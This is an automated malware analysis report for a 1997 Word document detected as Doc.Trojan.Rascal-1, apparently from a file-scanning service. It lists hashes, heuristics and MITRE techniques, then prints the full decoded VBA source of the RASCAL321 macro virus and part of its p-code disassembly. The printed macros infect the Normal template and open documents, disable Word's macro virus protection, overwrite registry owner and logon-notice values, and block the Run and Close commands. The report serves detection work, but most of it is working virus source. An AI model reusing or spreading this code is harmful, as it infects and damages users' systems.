Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c753c9e388c9d8ef…

MALICIOUS

Office (OLE)

79.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d7546f780e314e7034842b8095831a30 SHA-1: d63fceb9a9d0bd8653b8b9dd5959827a40370ef2 SHA-256: c753c9e388c9d8ef1143bf02812c9f36291bbb193c05500f44179ad44bb5cb0f
266 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing multiple VBA macros, including AutoOpen and Document_Open, which are commonly used to execute malicious code upon opening. The macro code attempts to obfuscate its actions but ultimately references a URL, 'http://rascal321.cjb.net', which is likely used to download a second-stage payload. The presence of legacy macro virus markers and the ClamAV detection further support its malicious nature.

Heuristics 8

  • ClamAV: Doc.Trojan.Rascal-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Rascal-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
              vbc.Item(i).Codemodule.DeleteLines 1, vbc.Item(i).Codemodule.Countoflines
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
            AutoOpen
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub document_open()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://rascal321.cjb.net� In document text (OLE body)
    • http://rascal321.cjb.netIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36612 bytes
SHA-256: 14ac2b2dd24bbc42961ac69093e4786fa84bb5f6b2aa133d5742c0e26630e47f
Detection
ClamAV: Doc.Trojan.Rascal-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "RASCAL321"
'Untuk orang yang aku cintai SHT
'
Public Const mname = "RASCAL321", usht = "Untuk orang yang aku cintai SHT", site = "http://rascal321.cjb.net", mw = "Microsoft Word", _
             lsht = "I love you SHT", pdnu = "Please do not use", isoft = "illegal software...", hklm = "HKEY_LOCAL_MACHINE\", _
             hkcu = "HKEY_CURRENT_USER\", sm = "Software\Microsoft\", cv = "Windows\CurrentVersion\", ACME = "MS Setup (ACME)\User Info\"

Private Sub document_open()
On Error Resume Next
   act
End Sub

Function rasc(oby As Object) As Boolean
On Error Resume Next
Dim i As Integer, n As Integer, kos As Boolean
kos = False
rasc = False
n = oby.VBProject.VBComponents.Count
Set vbc = oby.VBProject.VBComponents
   If vbc.Item(1).Name <> "Thisdocument" Then
      vbc.Item(1).Name = "Thisdocument"
   End If
   For i = 1 To n
       If vbc.Item(i).Name <> mname Then
          vbc.Item(i).Codemodule.DeleteLines 1, vbc.Item(i).Codemodule.Countoflines
       Else
          rasc = True
          If vbc.Item(i).Codemodule.Countoflines < 354 Or vbc.Item(i).Codemodule.Lines(1, 1) <> ("'" & usht) Then kos = True
       End If
   Next i
   If kos Then
      delmac oby
      rasc = False
   End If
End Function

Sub copymac(src As Object, dst As Object)
On Error Resume Next
   Application.OrganizerCopy Source:=src.FullName, Destination:=dst.FullName, Name:=mname, Object:=3
End Sub

Sub delmac(de As Object)
On Error Resume Next
   Application.OrganizerDelete Source:=de.FullName, Name:=mname, Object:=3
End Sub

Sub Autoexec()
On Error Resume Next
   amt
   act
End Sub

Sub act()
On Error Resume Next
Dim org As String, windir As String, fileok As String
    VBFalse
    With System
        .PrivateProfileString("", "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}", "InfoTip") = usht & "...."
        .PrivateProfileString("", hkcu & sm & "Internet Explorer\PageSetup\", "footer") = usht & " &u&b&d"
        .PrivateProfileString("", hkcu & sm & "Internet Explorer\PageSetup\", "header") = mname & " &w&bPage &p of &P"
        .PrivateProfileString("", hklm & sm & cv & "Winlogon\", "LegalNoticeCaption") = mname
        .PrivateProfileString("", hklm & sm & cv & "Winlogon\", "LegalNoticeText") = lsht
        org = .PrivateProfileString("", hklm & sm & cv, "RegisteredOwner")
        If org <> pdnu Then
           .PrivateProfileString("", hklm & sm & cv, "OrgOwner") = org
           org = .PrivateProfileString("", hklm & sm & cv, "RegisteredOrganization")
           .PrivateProfileString("", hklm & sm & cv, "OrgOrganization") = org
           org = .PrivateProfileString("", hkcu & sm & ACME, "DefName")
           .PrivateProfileString("", hkcu & sm & ACME, "OrgName") = org
           org = .PrivateProfileString("", hkcu & sm & ACME, "DefCompany")
           .PrivateProfileString("", hkcu & sm & ACME, "OrgCompany") = org
           .PrivateProfileString("", hkcu & sm & ACME, "DefName") = lsht
           .PrivateProfileString("", hkcu & sm & ACME, "DefCompany") = mname
           .PrivateProfileString("", hklm & sm & cv, "RegisteredOwner") = pdnu
           .PrivateProfileString("", hklm & sm & cv, "RegisteredOrganization") = isoft
        End If
    End With
    With Application
        .UserName = mname
        .UserInitials = Mid(lsht, 12, 3)
        .UserAddress = "virus@" & Mid(site, 8, 20) & " - " & site
    End With
   stl
   windir = Options.DefaultFilePath(8)
   With Dialogs(86)
        .Author = mname
        .Title = usht
        .Subject = lsht
        .Comments = pdnu & " " & isoft & "This is not dangerous virus, please do not " & "delete or modify this macros. Thank you. "
         .Execute
    End With
    If rasc(NormalTemplate) = False Then
        norattr NormalTemplate
        copymac ActiveDocument, NormalTemplate
        NormalTemplate.Save
    End If
    If rasc(NormalTemplate) = False Then
        Application.OrganizerCopy windir & "\Dxdlg32.dll", NormalTemplate.FullName, mname, 3
    End If
    fileok = Dir(windir & "\Office.dot")
    If fileok = "" Then
        NormalTemplate.OpenAsDocument.SaveAs windir & "\Office.dot", , , , AddToRecentFiles:=False
        ActiveDocument.Close SaveChanges:=-1
    End If
    fileok = Dir(windir & "\Dxdlg32.dll")
    If fileok = "" Then
        NormalTemplate.OpenAsDocument.SaveAs windir & "\Dxdlg32.dll", , , , AddToRecentFiles:=False
        ActiveDocument.Close SaveChanges:=-1
    End If
    If rasc(ActiveDocument) = False Then
        norattr ActiveDocument
        copymac NormalTemplate, ActiveDocument
    End If
    Infectall
End Sub

Sub ToolsMacro()
    err
On Error Resume Next
    appexit
End Sub

Sub ViewVBCode()
    err
On Error Resume Next
    NoRun
    appexit
End Sub

Sub ViewCode()
    ViewVBCode
End Sub

Sub FileSave()
On Error Resume Next
    show
    amt
    act
    With ActiveDocument
        .Save
        .Saved = True
    End With
End Sub

Sub FileOpen()
On Error Resume Next
Set AD = ActiveDocument
    VBFalse
    stl
    amt
    If Dialogs(80).show <> 0 Then
        AutoOpen
        If AD.Saved = False And Left(AD.Name, 8) <> "Document" Then AD.Save
    End If
    amf
End Sub

Sub AutoOpen()
On Error Resume Next
    VBFalse
    stl
    amt
    act
    show
    Infectall
End Sub

Sub FileClose()
On Error Resume Next
Set AD = ActiveDocument
    show
    amt
    act
    If AD.Saved = False And Left(AD.Name, 8) <> "Document" Then AD.Save
    AD.Close
    amf
End Sub

Sub AutoClose()
On Error Resume Next
Set AD = ActiveDocument
    stl
    act
    If AD.Saved = False And Left(AD.Name, 8) <> "Document" Then AD.Save
End Sub

Sub FileNew()
On Error Resume Next
    nstl
    If Dialogs(79).show <> 0 Then copymac NormalTemplate, ActiveDocument
    stl
End Sub

Sub FileNewDefault()
On Error Resume Next
    show
    WordBasic.FileNewDefault
    copymac NormalTemplate, ActiveDocument
End Sub

Sub ToolsOptions()
On Error Resume Next
    nstl
    Dialogs(974).show
    stl
    show
End Sub

Sub FilePrint()
On Error Resume Next
    If Minute(Now) > 55 Or Minute(Now) < 5 Then
        Set aw = ActiveWindow.ActivePane.View
        Set S = Selection
        aw.SeekView = 9
        S.TypeText mname
        aw.SeekView = 10
        S.TypeText usht
        aw.SeekView = 0
    End If
    Dialogs(88).show
End Sub

Sub NoRun()
On Error Resume Next
    With System
        .PrivateProfileString("", hkcu & sm & cv & "Policies\Explorer\", "NoClose") = "1"
        .PrivateProfileString("", hkcu & sm & cv & "Policies\Explorer\", "NoRun") = "1"
        .PrivateProfileString("", hklm & "Network\Logon\", "PrimaryProvider") = "Microsoft Network"
        .PrivateProfileString("", hklm & "Network\Logon\", "username") = "SHT-" & mname
        .PrivateProfileString("", hkcu & "Control Panel\International\", "s1159") = Mid(mname, 1, 6)
        .PrivateProfileString("", hkcu & "Control Panel\International\", "s2359") = Mid(mname, 1, 6)
    End With
End Sub

Sub err()
    MsgBox "This program has performed an illegal operation and will shut down.", 16, mw
End Sub

Sub norcap()
On Error Resume Next
    Application.Caption = mw
    System.Cursor = 2
End Sub

Sub chcap(tcap As String)
On Error Resume Next
    Application.Caption = mw & " - " & tcap
End Sub

Sub show()
On Error Resume Next
Set ap = Application
    If Minute(Now) < 15 Then
        chcap lsht
        ap.OnTime Now + TimeSerial(0, 0, 5), "norcap"
    End If
    If Minute(Now) >= 15 And Minute(Now) <= 30 Then
       chcap mname
       ap.OnTime Now + TimeSerial(0, 0, 5), "norcap"
    End If
    If Minute(Now) > 30 Then
       chcap site
       ap.OnTime Now + TimeSerial(0, 0, 5), "norcap"
    End If
    Application.StatusBar = "Have a nice day for all my friends in Pakuan University, Bogor."
    System.Cursor = 2
    bday
End Sub

Sub amt()
On Error Resume Next
    WordBasic.DisableAutoMacros True
End Sub

Sub amf()
On Error Resume Next
    WordBasic.DisableAutoMacros False
End Sub

Sub stl()
On Error Resume Next
Dim windir As String
   windir = System.PrivateProfileString("", hklm & sm & cv, "SystemRoot")
   With Options
      .VirusProtection = False
      .SaveNormalPrompt = False
      .ConfirmConversions = False
      .SavePropertiesPrompt = False
      .DefaultFilePath(8) = windir & "\System"
   End With
End Sub

Sub nstl()
On Error Resume Next
    With Options
        .VirusProtection = True
        .SaveNormalPrompt = True
        .ConfirmConversions = True
        .SavePropertiesPrompt = True
        .DefaultFilePath(8) = .DefaultFilePath(6) & "\Startup"
    End With
End Sub

Sub norattr(noby As Object)
On Error Resume Next
    SetAttr noby.FullName, vbArchive
End Sub

Sub bday()
On Error Resume Next
    If Month(Now) = 9 And Day(Now) = 10 Then
    Dim msg As String, ent As String, quo As String
        ent = Chr$(13)
        quo = Chr$(34)
        msg = "Selamat ulang tahun aku ucapkan untuk" & ent
        msg = msg & "orang yang sangat aku cintai " & quo & "SHT" & quo & "." & ent
        msg = msg & "Semoga panjang umur dan sukses selalu." & ent
        msg = msg & "Untuk itu sebaiknya anda meliburkan diri hari ini" & ent
        msg = msg & "dan memberikan ucapan selamat juga untuk " & quo & "SHT" & quo & "."
        msg = msg & ent & "Terimakasih."
        MsgBox msg, 64, usht
        Application.OnTime Now + TimeSerial(0, 5, 0), "appexit"
        System.Cursor = 2
    End If
End Sub

Sub appexit()
On Error Resume Next
Dim i As Integer, andoc As Object
    If Documents.Count > 0 Then
       For i = 1 To Documents.Count
          Set andoc = Documents(i)
          andoc.Saved = True
       Next i
    End If
    Application.Quit
End Sub

Sub VBFalse()
On Error Resume Next
       Application.ShowVisualBasicEditor = False
End Sub

Sub Infectall()
On Error Resume Next
Dim i As Integer, andoc As Object
    If Documents.Count > 0 Then
       For i = 1 To Documents.Count
          Set andoc = Documents(i)
          If rasc(andoc) = False Then copymac NormalTemplate, andoc
          If Left(andoc.Name, 8) <> "Document" Then andoc.Save
       Next i
       If Minute(Now) >= 55 Then Selection.TypeText pdnu & " " & isoft
    End If
End Sub



' Processing file: /tmp/qstore_p_8odmq_
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1280 bytes
' Macros/VBA/RASCAL321 - 25286 bytes
' Line #0:
' 	QuoteRem 0x0000 0x001F "Untuk orang yang aku cintai SHT"
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	LineCont 0x0008 12 00 0D 00 22 00 0D 00
' 	Dim (Public Const) 
' 	LitStr 0x0009 "RASCAL321"
' 	VarDefn mname
' 	LitStr 0x001F "Untuk orang yang aku cintai SHT"
' 	VarDefn usht
' 	LitStr 0x0018 "http://rascal321.cjb.net"
' 	VarDefn site
' 	LitStr 0x000E "Microsoft Word"
' 	VarDefn mw
' 	LitStr 0x000E "I love you SHT"
' 	VarDefn lsht
' 	LitStr 0x0011 "Please do not use"
' 	VarDefn pdnu
' 	LitStr 0x0013 "illegal software..."
' 	VarDefn isoft
' 	LitStr 0x0013 "HKEY_LOCAL_MACHINE\"
' 	VarDefn hklm
' 	LitStr 0x0012 "HKEY_CURRENT_USER\"
' 	VarDefn hkcu
' 	LitStr 0x0013 "Software\Microsoft\"
' 	VarDefn sm
' 	LitStr 0x0017 "Windows\CurrentVersion\"
' 	VarDefn cv
' 	LitStr 0x001A "MS Setup (ACME)\User Info\"
' 	VarDefn ACME
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub document_open())
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' 	ArgsCall act 0x0000 
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Function rasc(oby As Object) As Boolean)
' Line #10:
' 	OnError (Resume Next) 
' Line #11:
' 	Dim 
' 	VarDefn i (As Integer)
' 	VarDefn n (As Integer)
' 	VarDefn kos (As Boolean)
' Line #12:
' 	LitVarSpecial (False)
' 	St kos 
' Line #13:
' 	LitVarSpecial (False)
' 	St rasc 
' Line #14:
' 	Ld oby 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	St n 
' Line #15:
' 	SetStmt 
' 	Ld oby 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	Set vbc 
' Line #16:
' 	LitDI2 0x0001 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd New 
' 	LitStr 0x000C "Thisdocument"
' 	Ne 
' 	IfBlock 
' Line #17:
' 	LitStr 0x000C "Thisdocument"
' 	LitDI2 0x0001 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemSt New 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld n 
' 	For 
' Line #20:
' 	Ld i 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd New 
' 	Ld mname 
' 	Ne 
' 	IfBlock 
' Line #21:
' 	LitDI2 0x0001 
' 	Ld i 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	MemLd Countoflines 
' 	Ld i 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #22:
' 	ElseBlock 
' Line #23:
' 	LitVarSpecial (True)
' 	St rasc 
' Line #24:
' 	Ld i 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	MemLd Countoflines 
' 	LitDI2 0x0162 
' 	Lt 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld i 
' 	Ld vbc 
' 	ArgsMemLd Item 0x0001 
' 	MemLd Codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0001 "'"
' 	Ld usht 
' 	Concat 
' 	Paren 
' 	Ne 
' 	Or 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St kos 
' 	EndIf 
' Line #25:
' 	EndIfBlock 
' Line #26:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #27:
' 	Ld kos 
' 	IfBlock 
' Line #28:
' 	Ld oby 
' 	ArgsCall delmac 0x0001 
' Line #29:
' 	LitVarSpecial (False)
' 	St rasc 
' Line #30:
' 	EndIfBlock 
' Line #31:
' 	EndFunc 
' Line #32:
' Line #33:
' 	FuncDefn (Sub copymac(src As Object, dst As Object))
' Line #34:
' 	OnError (Resume Next) 
' Line #35:
' 	Ld src 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld dst 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	Ld mname 
' 	ParamNamed New 
' 	LitDI2 0x0003 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' 	FuncDefn (Sub delmac(de As Object))
' Line #39:
' 	OnError (Resume Next) 
' Line #40:
' 	Ld de 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld mname 
' 	ParamNamed New 
' 	LitDI2 0x0003 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #41:
' 	EndSub 
' Line #42:
' Line #43:
' 	FuncDefn (Sub Autoexec())
' Line #44:
' 	OnError (Resume Next) 
' Line #45:
' 	ArgsCall amt 0x0000 
' Line #46:
' 	ArgsCall act 0x0000 
' Line #47:
' 	EndSub 
' Line #48:
' Line #49:
' 	FuncDefn (Sub act())
' Line #50:
' 	OnError (Resume Next) 
' Line #51:
' 	Dim 
' 	VarDefn org (As String)
' 	VarDefn windir (As String)
' 	VarDefn fileok (As String)
' Line #52:
' 	ArgsCall VBFalse 0x0000 
' Line #53:
' 	StartWithExpr 
' 	Ld System 
' 	With 
' Line #54:
' 	Ld usht 
' 	LitStr 0x0004 "...."
' 	Concat 
' 	LitStr 0x0000 ""
' 	LitStr 0x003E "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}"
' 	LitStr 0x0007 "InfoTip"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #55:
' 	Ld usht 
' 	LitStr 0x0007 " &u&b&d"
' 	Concat 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	LitStr 0x001C "Internet Explorer\PageSetup\"
' 	Concat 
' 	LitStr 0x0006 "footer"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #56:
' 	Ld mname 
' 	LitStr 0x0012 " &w&bPage &p of &P"
' 	Concat 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	LitStr 0x001C "Internet Explorer\PageSetup\"
' 	Concat 
' 	LitStr 0x0006 "header"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #57:
' 	Ld mname 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x0009 "Winlogon\"
' 	Concat 
' 	LitStr 0x0012 "LegalNoticeCaption"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #58:
' 	Ld lsht 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x0009 "Winlogon\"
' 	Concat 
' 	LitStr 0x000F "LegalNoticeText"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #59:
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x000F "RegisteredOwner"
' 	ArgsMemLdWith PrivateProfileString 0x0003 
' 	St org 
' Line #60:
' 	Ld org 
' 	Ld pdnu 
' 	Ne 
' 	IfBlock 
' Line #61:
' 	Ld org 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x0008 "OrgOwner"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #62:
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x0016 "RegisteredOrganization"
' 	ArgsMemLdWith PrivateProfileString 0x0003 
' 	St org 
' Line #63:
' 	Ld org 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x000F "OrgOrganization"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #64:
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x0007 "DefName"
' 	ArgsMemLdWith PrivateProfileString 0x0003 
' 	St org 
' Line #65:
' 	Ld org 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x0007 "OrgName"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #66:
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x000A "DefCompany"
' 	ArgsMemLdWith PrivateProfileString 0x0003 
' 	St org 
' Line #67:
' 	Ld org 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x000A "OrgCompany"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #68:
' 	Ld lsht 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x0007 "DefName"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #69:
' 	Ld mname 
' 	LitStr 0x0000 ""
' 	Ld hkcu 
' 	Ld sm 
' 	Concat 
' 	Ld ACME 
' 	Concat 
' 	LitStr 0x000A "DefCompany"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #70:
' 	Ld pdnu 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x000F "RegisteredOwner"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #71:
' 	Ld isoft 
' 	LitStr 0x0000 ""
' 	Ld hklm 
' 	Ld sm 
' 	Concat 
' 	Ld cv 
' 	Concat 
' 	LitStr 0x0016 "RegisteredOrganization"
' 	ArgsMemStWith PrivateProfileString 0x0003 
' Line #72:
' 	EndIfBlock 
' Line #73:
' 	EndWith 
' Line #74:
' 	StartWithExpr 
' 	Ld Application 
' 	With 
' Line #75:
' 	Ld mname 
' 	MemStWith UserName 
' Line #76:
' 	Ld lsht 
' 	LitDI2 0x000C 
' 	LitDI2 0x0003 
' 	ArgsLd Mid$ 0x0003 
' 	MemStWith UserInitials 
' Line #77:
' 	LitStr 0x0006 "virus@"
' 	Ld site 
' 	LitDI2 0x0008 
' 	LitDI2 0x0014 
' 	ArgsLd Mid$ 0x0003 
' 	Concat 
' 	LitStr 0x0003 " - "
' 	Concat 
' 	Ld site 
' 	Concat 
' 	MemStWith UserAddress 
' Line #78:
' 	EndWith 
' Line #79:
' 	ArgsCall stl 0x0000 
' Line #80:
' 	LitDI2 0x0008 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	St windir 
' Line #81:
' 	StartWithExpr 
' 	LitDI2 0x0056 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' Line #82:
' 	Ld mname 
' 	MemStWith Author 
' Line #83:
' 	Ld usht 
' 	MemStWith Title 
' Line #84:
' 	Ld lsht 
' 	MemStWith Subject 
' Line #85:
' 	Ld pdnu 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld isoft 
' 	Concat 
' 	LitStr 0x002B "This is not dangerous virus, please do not "
' 	Concat 
' 	LitStr 0x0029 "delete or modify this macros. Thank you. "
' 	Concat 
' 	MemStWith Comments 
' Line #86:
' 	ArgsMemCallWith Execute 0x0000 
' Line #87:
' 	EndWith 
' Line #88:
' 	Ld NormalTemplate 
' 	ArgsLd rasc 0x0001 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #89:
' 	Ld NormalTemplate 
' 	ArgsCall norattr 0x0001 
' Line #90:
' 	Ld ActiveDocument 
' 	Ld NormalTemplate 
' 	ArgsCall copymac 0x0002 
' Line #91:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #92:
' 	EndIfBlock 
' Line #93:
' 	Ld NormalTemplate 
' 	ArgsLd rasc 0x0001 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #94:
' 	Ld windir 
' 	LitStr 0x000C "\Dxdlg32.dll"
' 	Concat 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	Ld mname 
' 	LitDI2 0x0003 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #95:
' 	EndIfBlock 
' Line #96:
' 	Ld windir 
' 	LitStr 0x000B "\Office.dot"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St fileok 
' Line #97:
' 	Ld fileok 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #98:
' 	Ld windir 
' 	LitStr 0x000B "\Office.dot"
' 	Concat 
' 	ParamOmitted 
' 	ParamOmitted 
' 	ParamOmitted 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	Ld NormalTemplate 
' 	MemLd OpenAsDocument 
' 	ArgsMemCall SaveAs 0x0005 
' Line #99:
' 	LitDI2 0x0001 
' 	UMi 
' 	ParamNamed SaveChanges 
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0001 
' Line #100:
' 	EndIfBlock 
' Line #101:
' 	Ld windir 
' 	LitStr 0x000C "\Dxdlg32.dll"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St fileok 
' Line #102:
' 	Ld fileok 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #103:
' 	Ld windir 
' 	LitStr 0x000C "\Dxdlg32.dll"
' 	Concat 
' 	ParamOmitted 
' 	ParamOmitted 
' 	ParamOmitted 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	Ld NormalTemplate 
' 	MemLd OpenAsDocument 
' 	ArgsMemCall SaveAs 0x0005 
' Line #104:
' 	LitDI2 0x0001 
' 	UMi 
' 	ParamNamed SaveChanges 
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0001 
' Line #105:
' 	EndIfBlock 
' Line #106:
' 	Ld ActiveDocument 
' 	ArgsLd rasc 0x0001 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #107:
' 	Ld ActiveDocument 
' 	ArgsCall norattr 0x0001 
' Line #108:
' 	Ld NormalTemplate 
' 	Ld ActiveDocument 
' 	ArgsCall copymac 0x0002 
' Line #109:
' 	EndIfBlock 
' Line #110:
' 	ArgsCall Infectall 0x0000 
' Line #111:
' 	EndSub 
' Line #112:
' Line #113:
' 	FuncDefn (Sub ToolsMacro())
' Line #114:
' 	ArgsCall err 0x0000 
' Line #115:
' 	OnError (Resume Next) 
' Line #116:
' 	ArgsCall appexit 0x0000 
' Line #117:
' 	EndSub 
' Line #118:
' Line #119:
' 	FuncDefn (Sub ViewVBCode())
' Line #120:
' 	ArgsCall err 0x0000 
' Line #121:
' 	OnError (Resume Next) 
' Line #122:
' 	ArgsCall NoRun 0x0000 
' Line #123:
' 	ArgsCall appexit 0x0000 
' Line #124:
' 	EndSub 
' Line #125:
' Line #126:
' 	FuncDefn (Sub ViewCode())
' Line #127:
' 	ArgsCall ViewVBCode 0x0000 
' Line #128:
' 	EndSub 
' Line #129:
' Line #130:
' 	FuncDefn (Sub FileSave())
' Line #131:
' 	OnError (Resume Next) 
' Line #132:
' 	ArgsCall show 0x0000 
…